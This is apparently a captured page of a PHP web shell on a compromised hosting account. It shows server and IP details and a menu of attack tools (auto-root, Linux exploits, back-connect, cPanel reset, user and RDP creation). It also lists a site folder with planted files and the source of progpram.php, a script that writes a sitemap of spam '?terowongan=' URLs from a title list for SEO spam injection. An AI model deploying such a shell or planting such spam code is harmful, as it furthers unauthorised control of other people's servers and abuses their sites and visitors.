Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.149.231.122
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
amvm /
public_html /
kakrakalan /
images /
journey /
[ HOME SHELL ]
Name
Size
Permission
Action
daftarnya.txt
69.63
KB
-rw-r--r--
google489e8d15cdd95ebb.html
53
B
-rw-r--r--
index.php
433.5
KB
-rw-r--r--
j0.jpg
170.37
KB
-rw-r--r--
j1.jpg
77.44
KB
-rw-r--r--
j10.jpg
68.64
KB
-rw-r--r--
j11.jpg
54.79
KB
-rw-r--r--
j13.jpg
90.86
KB
-rw-r--r--
j14.jpg
110.22
KB
-rw-r--r--
j15.jpg
111.72
KB
-rw-r--r--
j16.jpg
89.52
KB
-rw-r--r--
j17.jpg
121.51
KB
-rw-r--r--
j18.jpg
92.06
KB
-rw-r--r--
j2.jpg
81.88
KB
-rw-r--r--
j3.jpg
69.23
KB
-rw-r--r--
j5.jpg
76.52
KB
-rw-r--r--
j7.jpg
94.57
KB
-rw-r--r--
j8.jpg
89.91
KB
-rw-r--r--
j9.jpg
97.3
KB
-rw-r--r--
progpram.php
1.58
KB
-rw-r--r--
santattar-425x500.jpg
33.59
KB
-rw-r--r--
santteja-425x500.jpg
31.71
KB
-rw-r--r--
sitemap.xml
358.17
KB
-rw-r--r--
valley-full.jpg
120.4
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : progpram.php
<?php function getFileRowCount($filename) { $file = fopen($filename, "r"); $rowCount = 0; while (!feof($file)) { fgets($file); $rowCount++; } fclose($file); return $rowCount; } $protocol = isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? 'https' : 'http'; $fullUrl = $protocol . "://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; if (isset($fullUrl)) { $parsedUrl = parse_url($fullUrl); $scheme = isset($parsedUrl['scheme']) ? $parsedUrl['scheme'] : ''; $host = isset($parsedUrl['host']) ? $parsedUrl['host'] : ''; $path = isset($parsedUrl['path']) ? $parsedUrl['path'] : ''; $baseUrl = $scheme . "://" . $host . $path; $urlAsli = str_replace("progpram.php", "", $baseUrl); $judulFile = "daftarnya.txt"; $jumlahBaris = getFileRowCount($judulFile); $sitemapFile = fopen("sitemap.xml", "w"); fwrite($sitemapFile, '<?xml version="1.0" encoding="UTF-8"?>' . PHP_EOL); fwrite($sitemapFile, '<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . PHP_EOL); $fileLines = file($judulFile, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); foreach ($fileLines as $index => $judul) { $sitemapLink = $urlAsli . '?terowongan=' . urlencode($judul); fwrite($sitemapFile, ' <url>' . PHP_EOL); fwrite($sitemapFile, ' <loc>' . $sitemapLink . '</loc>' . PHP_EOL); fwrite($sitemapFile, ' </url>' . PHP_EOL); } fwrite($sitemapFile, '</urlset>' . PHP_EOL); fclose($sitemapFile); echo "There is nothing in here."; } else { echo "URL saat ini tidak didefinisikan."; } ?>
Close